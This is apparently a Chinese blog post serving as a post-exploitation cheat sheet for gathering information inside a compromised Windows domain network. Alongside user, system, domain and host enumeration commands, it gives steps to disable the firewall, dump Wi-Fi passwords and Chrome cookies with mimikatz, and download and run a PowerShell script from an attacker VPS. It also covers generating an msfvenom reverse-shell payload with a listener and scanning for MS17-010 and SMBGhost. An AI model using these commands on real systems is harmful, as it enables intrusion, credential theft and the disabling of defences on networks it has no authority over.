内网信息收集

末蓝、 2023-10-12 18:01 64阅读 0赞

获取目标主机控制权后，执行命令需要管理员权限，需要先提权

## 用户信息收集 ##

查看本机用户列表  
net user

获取本地管理员信息  
net localgroup administrators

查看当前在线用户  
quser  
quser user  
query user || qwinsta

查看当前用户在目标系统中的具体权限  
whoami /all

查看当前权限  
whoami && whoami /priv

查看当前机器中所有的组名，了解不同组的职能，如，IT,HR,ADMIN,FILE  
net localgroup

## 系统信息收集 ##

\#查询网络配置信息。进行IP地址段信息收集  
ipconfig /all

\#查询操作系统及软件信息  
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" \# 英文系统  
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" \#中文系统

\#查看当前系统版本  
wmic OS get Caption,CSDVersion,OSArchitecture,Version

\#查看系统体系结构  
echo %PROCESSOR\_ARCHITECTURE%

\#查询本机服务信息  
wmic service list brief

\#查看安装的软件的版本、路径等  
wmic product get name, version  
powershell "Get-WmiObject -class Win32\_Product |Select-Object -Property name,  
version"

\#查询进程信息  
tasklist  
wmic process list brief

\#查看启动程序信息

wmic startup get command,caption

\#查看计划任务  
at（win10之前）  
schtasks /query /fo LIST /v（win10）

\#列出或断开本地计算机与所连接的客户端的对话  
net session

\#查看远程连接信息  
cmdkey /l

\#查看补丁列表  
systeminfo | findstr KB

\#查看补丁的名称、描述、ID、安装时间等  
wmic qfe get Caption,Description,HotFixID,InstalledOn

\#查看杀软  
WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get  
displayName /Format:List

\#查看本地密码策略  
net accounts

\#查看hosts文件：  
Linux：cat /etc/hosts  
Windows：type c:\\Windows\\system32\\drivers\\etc\\hosts

## 网络信息收集 ##

\#查看本机所有的tcp,udp端口连接及其对应的pid  
netstat -ano

\#查看本机所有的tcp,udp端口连接,pid及其对应的发起程序  
netstat -anob

\#查看本机共享列表和可访问的域共享列表 （445端口）

net share  
wmic share get name,path,status

\#查看路由表和arp缓存  
route print  
arp -a

## 防火墙信息收集 ##

\#关闭防火墙(Windows Server 2003 以前的版本)  
netsh firewall set opmode disable

\#关闭防火墙(Windows Server 2003 以后的版本)  
netsh advfirewall set allprofiles state off

\#查看防火墙配置(netsh命令也可以用作端口转发)  
netsh firewall show config

\#查看配置规则  
netsh advfirewall firewall show rule name=all

\#wifi密码  
netsh wlan show profile  
netsh wlan show profile name="EEFUNG" key=clear

##  ##

## 其他信息收集 ##

\#回收站内容获取  
FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do  
dir /a /b C:\\$Recycle.Bin\\%d\\ ^>%c.txt

cd C:\\$Recycle.Bin\\S-1-5-21-3845785564-1101086751-683477353-1001\\  
$I 开头的文件保存的是路径信息  
$R 开头的文件保存的是文件内容

\#Chrome历史记录和Cookie获取  
%localappdata%\\google\\chrome\\USERDA~1\\default\\LOGIND~1  
%localappdata%\\google\\chrome\\USERDA~1\\default\\cookies

chrome的用户信息，保存在本地文件为sqlite 数据库格式

mimikatz.exe privilege::debug log "dpapi::chrome  
/in:%localappdata%\\google\\chrome\\USERDA~1\\default\\cookies /unprotect" exit

REG QUERY "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet  
Settings" /v ProxyServer

\#通过pac文件自动代理情况  
REG QUERY "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet  
Settings" /v AutoConfigURL

##    自动信息收集 ##

powershell脚本  
FTP访问、共享连接、putty连接、驱动、应用程序、hosts 文件、进程、无线网络记录

> powershell iex(new-object  
> net.webclient).downloadstring('http://vpsip:8000/Get-Information.ps1');Get-Information
> 
> Nishang-Gather-Get-Information.ps1  
> https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1

## msf自动信息收集 ##

#### 反弹shell ####

生成payload：

msfvenom -p windows/x64/meterpreter/reverse\_tcp lhost=vpsIP lport=1122 -f exe -o xxx.exe

将生成的payload发送给目标机器并让其执行

设置侦听：

Use exploit/multi/handler  
Set payload windows/meterpreter/reverse\_tcp  
Set LHOST xxx.xxx.xxx.xxx  
Set LPOST 1122  
Exploit

反弹shell

session 1 进入会话

\#scraper  
Meterpreter > run scraper

ls -la \#查看文件 .msf4  
/root/.msf4/logs/scripts/scraper

\#winenum  
Meterpreter > run winenum

查看文件：  
/root/.msf4/logs/scripts/winenum

## 架构信息类收集-网络、用户、域控 ##

网络信息收集

\#查看本机所有的tcp,udp端口连接及其对应的pid  
netstat -ano

\#查看本机所有的tcp,udp端口连接,pid及其对应的发起程序  
netstat -anob

\#查看本机共享列表和可访问的域共享列表 （445端口）  
net share  
wmic share get name,path,status

\#查看路由表和arp缓存  
route print  
arp -a

ipconfig /all 通过查询网络信息判断是否在域内  
nslookup + dns后缀  
whoami /all 用户权限,获取SID  
net config workstation 登录信息  
net user 本地用户  
net localgroup 本地用户组  
net user /domain 或 wmic useraccount get /all 获取域用户信息  
net group /domain 获取域用户组信息（Enterprise Admins组权限最大）  
wmic useraccount get /all 涉及域用户详细信息  
net group "Domain Admins" /domain 查询域管理员账户  
net group "Enterprise Admins" /domain 查询域系统管理员用户组  
net group "Domain Controllers" /domain 查询域控制器  
net view /domain:域名 查询域内所有计算机  
net group "domain computers" /domain 查询所有域成员列表  
net accounts /domain 查看域管理策略  
net localgroup administrators /domain 登录本机的域管理员  
nslookup -q=ns de1ay.com 查看域内DNS服务器定位域控

> 权限说明
> 
> Domain Admins : 域管理员组  
> Domain Computers : 域内机器  
> Domain Controllers ：域控制器  
> Domain Guest ： 域访客，权限较低  
> Domain User ： 域用户  
> Enterprise Admins ： 企业系统管理员用户

## dsquery信息收集 ##

dsquery工具一般在域控上才有,不过你可以上传一个dsquery

dsquery computer 查看当前域内的所有机器  
dsquery user 查看当前域中的所有账户名  
dsquery group 查看当前域内的所有组名  
dsquery site 查看域内所有的web站点  
dsquery server 查看当前域中的服务器(一般结果只有域控的主机名)  
dsquery user domainroot -name admin\* -limit 240 查询前240个以admin开头的用户名  
nltest /domain\_trusts 查询域内信任关系  
nltest /DCLIST:xs 查看域控制器的机器名

\#查看域控制器的机器名  
nltest /DCLIST:xxxxx(域名)

\#查看域内的主域控，仅限win2008及之后的系统  
netdom query pdc

\#查看域控主机名  
nslookup -type=srv \_ldap.\_tcp

\#查看域内信任关系  
nltest /domain\_trusts

\#查看域内邮件服务器  
nslookup -q=mx 域名.com

\#查看域内DNS服务器  
nslookup -q=ns 域名.com

## 探测域内存活主机 ##

Netbios协议探测  
Netbios简介：  
IBM公司开发，主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用程序编程接口（API），为程序提供了请求低级服务的同一的命令集，作用是为了给局域网提供网络以及其他特殊功能。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名-——特指基于NETBIOS协议获得计算机名称——解析为相应IP地址，实现信息通讯，所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享

Nbtscan  
使用nbtscan扫描本地或远程TCP/IP网络上开放的NetBIOS名称服务器  
输出的结果第一列为IP地址，第二列为机器名和所在域的名称，第三列即最后一列为及其所开启的服务的列表

> Windows： nbtscan.exe –m 10.10.10.0/24  
> Linux： nbtscan -r 10.10.10.0/24

## 工具信息收集LadanGO、Adfind、Fscan ##

#### Ladongo ####

1.多协议探测存活主机 （IP、机器名、MAC地址、制造商）  
Ladon 10.10.10.0/24 OnlinePC

2.多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）  
Ladon 10.10.10.0/24 OsScan

3.扫描存活主机  
Ladon 10.10.10.0/24 OnlineIP

4.ICMP扫描存活主机  
Ladon 10.10.10.0/24 Ping

5.扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）  
Ladon 10.10.10.0/24 MS17010

6.SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）  
Ladon 10.10.10.0/24 SMBGhost

#### Adfind ####

列出域控制器名称：  
AdFind -sc dclist